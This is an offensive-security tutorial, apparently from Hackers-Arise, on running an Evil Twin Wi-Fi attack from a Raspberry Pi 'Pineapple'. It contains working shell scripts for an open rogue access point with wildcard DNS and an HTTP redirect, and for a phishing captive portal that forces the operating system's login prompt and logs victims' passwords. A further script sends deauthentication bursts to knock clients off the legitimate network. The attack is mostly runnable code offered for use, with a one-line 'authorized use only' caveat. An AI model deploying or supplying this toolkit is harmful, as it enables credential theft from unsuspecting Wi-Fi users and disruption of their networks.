Welcome back, aspiring cyberwarriors!
In this second part of the Pineapple Attacks series, we move beyond purely technical weaknesses in wireless protocols and focus on the human behind the device. Today we will explore the Evil Twin attack as implemented on a custom-built Raspberry Pi-based Pineapple, showing you how wireless impersonation and social engineering can be combined into an effective attack chain. Rather than relying on cracking encryption or exploiting client-side vulnerabilities, the Evil Twin approach abuses user trust, captive portal mechanics, and normal operating system behavior to extract credentials in clear text.
As always, these techniques are intended for authorized use only.
Evil Twin
The “Evil Twin” attack imitates a wireless network that users already trust. What is exploited is that trust itself: like phishing, the attack targets people rather than client devices or protocol weaknesses.
Since not all Wi-Fi networks are vulnerable to the attacks described earlier, and an attacker is far from always able to recover a password, another option is simply to ask the users for it. Users often turn out to be the weakest link in the perimeter. In this scenario, the Pineapple operates as a Wi-Fi access point with the same network name as the target. The only difference is that the network is open. The bet is that the user will connect to what looks like a legitimate wireless network and type the password into a login page, from which it reaches the attacker in clear text.
To increase the likelihood that users connect to the rogue network, the Pineapple can, just as in the previous attacks, send deauthentication packets, disconnecting all clients from the legitimate wireless network. For an Evil Twin attack to succeed, the attacker must correctly launch a wireless network with a name that will reliably attract users’ attention, and build a convincing captive portal with proper pretexting. The components that form this attack are defined in the startup.sh script. The first component is the access point itself. The script used to launch the access point looks as follows.

It’s called hostapd.sh and should be placed in /home/pi/eviltwin/. You can find it here.
As soon as a client connects to the Pineapple, the green LED lights up. A configuration file template for an open wireless network looks like this:

The second component is the script that launches the DHCP server.

You can find the script here.
The yellow LED indicates that the client has received an IP address and has begun using the wireless network. The configuration of the offered network is as follows.

It is worth noting that the popular dnsmasq program is not only a DHCP server but also a DNS server, and here it is configured in a deliberately deceptive way. The last line of its configuration instructs it to answer any DNS query from a victim with the IP address of the Pineapple. As a result, every name a client looks up resolves to the attacking device.
To ensure that no HTTP request bypasses the device, for example from a client with a hard-coded resolver or a cached address, all web traffic from clients is also redirected to the Pineapple at the network level using iptables. Note that only plain HTTP (TCP port 80) can be redirected this way; HTTPS cannot be intercepted without certificate errors, which is why the attack relies on the captive portal mechanism rather than on the victim's ordinary browsing:
Pi > iptables -t nat -A PREROUTING -i wlan0 -p tcp --dport 80 -j REDIRECT --to-ports 80
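The three network-side components described above (open access point, DHCP and DNS with wildcard resolution, and the port-80 redirect), collected into one added example. This is not the page's own hostapd.sh, DHCP script or startup.sh; it is a startup-style script written for this article. It assumes the AP interface is wlan0 and that the Pineapple takes the address 10.0.0.1/24 (neither is stated on the page); the SSID and channel are placeholders.

```shell
#!/bin/sh
# Added example, not the page's own scripts. Generates the hostapd and dnsmasq
# configuration for an open Evil Twin access point and applies the port-80
# redirect. Assumptions (not from the page): AP interface wlan0, gateway
# address 10.0.0.1/24, configuration files under /home/pi/eviltwin/.
set -eu

AP_IF="${AP_IF:-wlan0}"
AP_ADDR="${AP_ADDR:-10.0.0.1}"
AP_NET="${AP_NET:-10.0.0}"
ETDIR="${ETDIR:-/home/pi/eviltwin}"

# hostapd: an open network is simply one with no wpa= line. Using the target's
# SSID makes it an "evil twin"; any attractive name ("Free Wi-Fi") works for
# the purely social-engineering variant.
hostapd_conf() {  # $1=ssid $2=channel
  cat <<EOF
interface=$AP_IF
driver=nl80211
ssid=$1
hw_mode=g
channel=$2
auth_algs=1
ignore_broadcast_ssid=0
EOF
}

# dnsmasq: DHCP hands out the Pineapple as both router (option 3) and DNS
# server (option 6). The address=/#/ line answers *every* DNS name with the
# Pineapple's own address, so each client request lands on the captive portal.
dnsmasq_conf() {
  cat <<EOF
interface=$AP_IF
bind-interfaces
no-resolv
dhcp-range=$AP_NET.10,$AP_NET.100,255.255.255.0,12h
dhcp-option=3,$AP_ADDR
dhcp-option=6,$AP_ADDR
address=/#/$AP_ADDR
log-queries
log-dhcp
EOF
}

# Safety net for clients that ignore the offered resolver or use a cached IP:
# any TCP/80 traffic arriving on the AP interface is redirected to the portal.
redirect_rule() {
  printf 'iptables -t nat -A PREROUTING -i %s -p tcp --dport 80 -j REDIRECT --to-ports 80\n' "$AP_IF"
}

start_ap() {  # $1=ssid $2=channel
  hostapd_conf "$1" "$2" > "$ETDIR/hostapd.conf"
  dnsmasq_conf > "$ETDIR/dnsmasq.conf"
  ip link set "$AP_IF" up
  ip addr replace "$AP_ADDR/24" dev "$AP_IF"
  eval "$(redirect_rule)"
  dnsmasq --conf-file="$ETDIR/dnsmasq.conf"   # daemonises by default
  hostapd -B "$ETDIR/hostapd.conf"            # -B: run in the background
}

# Only act when invoked as:  ./netsetup.sh start "Free Wi-Fi" 6
case "${1:-}" in
  start) start_ap "${2:-Free Wi-Fi}" "${3:-6}" ;;
esac
```

The config generators are separate from the part that touches the system so the generated files can be inspected before anything is started; the hostapd template contains no wpa= line, which is all it takes to make the twin an open network.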
Now it is time for the third and most important component of the attack. It’s a small captive portal implemented using the PHP interpreter’s built-in web server.

Find it here.
It would be hard to implement a web server any more simply than this. If the user enters a password, the Pineapple signals this with a red LED. All requests are handled by the captive.php script.

Proper implementation of the captive portal is the delicate part of the attack. Modern browsers send very little over plain HTTP (HTTPS-only modes and HSTS push almost all navigation to TLS), so waiting for the victim to browse to an unencrypted site is unreliable. Captive portals, however, are a widely accepted mechanism for gating internet access on open wireless networks, so every modern operating system probes for one immediately after connecting by fetching a known HTTP URL and comparing the reply with an expected value (a 204 status or a fixed body, depending on the vendor). If the reply matches, the system assumes the internet is reachable and the attack fails. To prevent this, the server must answer that probe, and any other request, even one for a non-existent resource, with an HTTP 200 response and non-empty content. The mismatch makes the operating system conclude that a captive portal is present, and it automatically displays the phishing page to the user, prompting them to enter certain data.
captive.php is merely a small wrapper between requests from victim clients and the web pages they see. Modern web pages are fairly complex, and building them from scratch is not the smartest approach. Instead, any authentication web page can be saved using a browser, and all files can be copied into /home/pi/eviltwin/www/. This makes it possible to handle all HTTP requests with a single PHP script and remain abstracted from coding during the attack.
Since data from web forms is almost always sent using the HTTP POST method, all such requests will be saved. If any of these requests contain the password parameter, the captive.sh script will react by lighting up the red LED.
User-entered data is highlighted in red in the terminal so that the attack status can be monitored even during a remote 4G connection. All output from all scripts is also saved to the Pineapple’s memory card.
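The request handling described above (answer every request, probe or not, with 200 and a body; log every POST; flag a password field), as an added example that is not the page's captive.sh or captive.php. It is written as shell functions so the probe handling and POST capture can be exercised offline; it assumes the saved portal assets live in $WWW with index.html as the login page and that captured requests are appended to $LOGFILE, none of which the page specifies.

```shell
#!/bin/sh
# Added example, not the page's captive.sh/captive.php: the request-handling
# core of a credential-capturing captive portal as shell functions.
# Assumptions (not from the page): portal assets in $WWW with index.html as the
# login page; captured requests appended to $LOGFILE.
set -eu

# Connectivity-check paths used by common clients. Each expects a specific
# reply (Android/Chrome: 204 No Content; Apple: a body saying "Success";
# Windows: "Microsoft Connect Test"; Firefox: "success"). Answering any of them
# with 200 and a different body makes the OS assume a captive portal is present
# and open its login helper on our page.
is_probe() {
  case "$1" in
    /generate_204|/gen_204|/hotspot-detect.html|/connecttest.txt|/ncsi.txt|/success.txt|/canonical.html) return 0 ;;
    *) return 1 ;;
  esac
}

# Percent-decoding for x-www-form-urlencoded values ('+' is a space).
urldecode() {
  printf '%s' "$1" | awk '
    function hexval(h,    n, i) {
      n = 0
      for (i = 1; i <= length(h); i++)
        n = n * 16 + index("0123456789abcdef", tolower(substr(h, i, 1))) - 1
      return n
    }
    {
      s = $0; gsub(/\+/, " ", s); out = ""
      while (match(s, /%[0-9A-Fa-f][0-9A-Fa-f]/)) {
        out = out substr(s, 1, RSTART - 1) sprintf("%c", hexval(substr(s, RSTART + 1, 2)))
        s = substr(s, RSTART + 3)
      }
      printf "%s", out s
    }'
}

# One field out of a form body:  form_field 'user=a&password=b' password  -> b
form_field() {
  printf '%s\n' "$1" | tr '&' '\n' | sed -n "s/^$2=//p" | head -n 1
}

# Decoded password from a POST body, or nothing if the form had none.
captured_password() {
  pw=$(form_field "$1" password)
  if [ -n "$pw" ]; then urldecode "$pw"; fi
}

respond_200() {  # $1 = file to send as the body
  len=$(wc -c < "$1" | tr -d ' ')
  printf 'HTTP/1.1 200 OK\r\nContent-Type: text/html; charset=utf-8\r\nContent-Length: %s\r\nCache-Control: no-store\r\nConnection: close\r\n\r\n' "$len"
  cat "$1"
}

# handle_request METHOD PATH [BODY]: writes the HTTP response to stdout.
# Every POST is logged; a password field is echoed in red on stderr (the LED
# hook on the Pineapple would go in the same place). Every request, probe or
# not, existing asset or not, gets 200 plus a non-empty body.
handle_request() {
  method=$1 path=$2 body=${3:-}
  www=${WWW:-/home/pi/eviltwin/www}
  log=${LOGFILE:-/home/pi/eviltwin/captured.log}
  if [ "$method" = POST ]; then
    printf '%s POST %s %s\n' "$(date -u +%Y-%m-%dT%H:%M:%SZ)" "$path" "$body" >> "$log"
    pw=$(captured_password "$body")
    if [ -n "$pw" ]; then printf '\033[31m[+] password: %s\033[0m\n' "$pw" >&2; fi
  elif is_probe "$path"; then
    printf '[*] captive-portal probe %s: answering 200 so the client opens the portal\n' "$path" >&2
  fi
  clean=${path%%\?*}                                  # drop the query string
  case "$clean" in *..*) clean=/ ;; esac              # stay inside the asset dir
  if [ -f "$www$clean" ]; then respond_200 "$www$clean"; else respond_200 "$www/index.html"; fi
}
```

These functions are deliberately independent of the listener: the page's own portal uses the PHP built-in server, but any socket helper that hands you the request line and body can call handle_request and write its output back to the client. The one property that must not be lost when adapting it is the unconditional 200 with content, since that is what triggers the operating system's captive portal prompt.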
Because the Evil Twin attack is social in nature, each specific situation may require its own captive portal design. The attacker does not necessarily have to request the password for a specific access point. Victims may be presented with any web form, from social networks to any other website. The key is to convince the user to enter the data the attacker is interested in obtaining. It is not even necessary to imitate a legitimate network; what matters is attracting the user’s interest. The network could be called something as simple as “Free Wi-Fi.”
The final, optional touch is disconnecting clients from the legitimate network (logical signal jamming) using the deauthentication script.

When performing an Evil Twin attack with signal jamming, it is important not to “shoot yourself in the foot” and to exclude the phishing wireless network itself from the target list.
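Selecting deauthentication targets without hitting the phishing network itself, as an added example that is not the page's deauthentication script. It reads an airodump-ng CSV scan, keeps the access points that carry the target ESSID, drops the rogue AP's own BSSID, and drives aireplay-ng from a second adapter. Assumptions not stated on the page: the injecting interface is wlan1mon (a second adapter in monitor mode, since the AP interface cannot inject while serving clients) and the aircrack-ng suite is installed; the CSV sample in the test is constructed.

```shell
#!/bin/sh
# Added example, not the page's deauthentication script. Builds the deauth
# target list from an airodump-ng CSV and makes sure the Evil Twin's own BSSID
# is never on it. Assumptions (not from the page): a second adapter in monitor
# mode (wlan1mon) does the injecting; aireplay-ng is installed.
set -eu

MON_IF="${MON_IF:-wlan1mon}"

# Print "BSSID channel" for every AP in the CSV whose ESSID is $2, except the
# BSSID given in $3 (our own rogue AP). airodump-ng CSV columns: 1=BSSID,
# 4=channel, 14=ESSID; the station section after "Station MAC" is ignored.
deauth_targets() {  # $1=csv-file $2=target-essid $3=own-bssid
  awk -F', *' -v essid="$2" -v own="$3" '
    /^Station MAC/ { exit }                       # end of the AP section
    $1 != "BSSID" && NF >= 14 && $14 == essid && toupper($1) != toupper(own) {
      print toupper($1), $4
    }' "$1"
}

# Send a finite deauth burst to each target in turn. --deauth 0 would run
# forever on one AP; a per-round count lets the loop revisit APs on other
# channels, retuning the monitor interface before each burst.
run_deauth() {  # $1=csv-file $2=target-essid $3=own-bssid
  deauth_targets "$1" "$2" "$3" | while read -r bssid chan; do
    iw dev "$MON_IF" set channel "$chan"
    aireplay-ng --deauth 10 -a "$bssid" "$MON_IF"
  done
}

# Invoke as:  ./deauth.sh run scan-01.csv "Corp-WiFi" de:ad:be:ef:00:01
case "${1:-}" in
  run) run_deauth "${2:?csv file}" "${3:?target ESSID}" "${4:?own BSSID}" ;;
esac
```

Filtering on the ESSID rather than on a hand-typed BSSID list matters when the legitimate network has several access points: all of them are jammed, while the own BSSID is excluded by address so the comparison cannot be fooled by the identical SSID.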
There are two things to keep in mind. First, the user must select the rogue network manually: a modern client device will not automatically switch from a saved secured network to an open one, even if the rogue network’s name exactly matches the legitimate one, because the security type is part of the stored profile. Only older operating systems and legacy devices exhibited such indiscriminate behavior, downgrading from WPA to open when the SSID was the same. Second, the attacker still depends on the user actually typing credentials; nothing is obtained until someone does. Once such a user is found, every web page they open will persistently prompt them to enter a password, which is accepted in clear text and stored on the Pineapple.
The Evil Twin attack can be particularly effective in restricted or high-security environments with strict rules, where employees “starved for internet access” may be willing to do almost anything, including entering arbitrary data just to get online. In such environments, an attacker exploiting human weaknesses can realistically obtain domain credentials and much more, later using them to access someone’s email or connect via VPN to an internal network.
Summary
This article showed the practical implementation of an Evil Twin attack using a Raspberry Pi-based Pineapple, demonstrating how social engineering can be used to capture credentials over wireless networks. It covered the setup of a rogue access point, DHCP and DNS manipulation, traffic redirection, and a lightweight captive portal that exploits standard operating system behavior to prompt users for credentials.
For the attack to function correctly, all scripts, configuration files, and web assets referenced in the article must be placed in the /home/pi/eviltwin directory, as the startup and control scripts assume this exact file structure.
If you like the work we’re doing here and want to take your skills even further, we also offer a full SDR for Hackers Career Path. It’s a structured training program designed to guide you from the fundamentals of Software-Defined Radio all the way to advanced, real-world applications in cybersecurity and signals intelligence.
Source: HackersArise
Source Link: https://hackers-arise.com/pineapple-attacks-building-your-own-pineapple-part-2/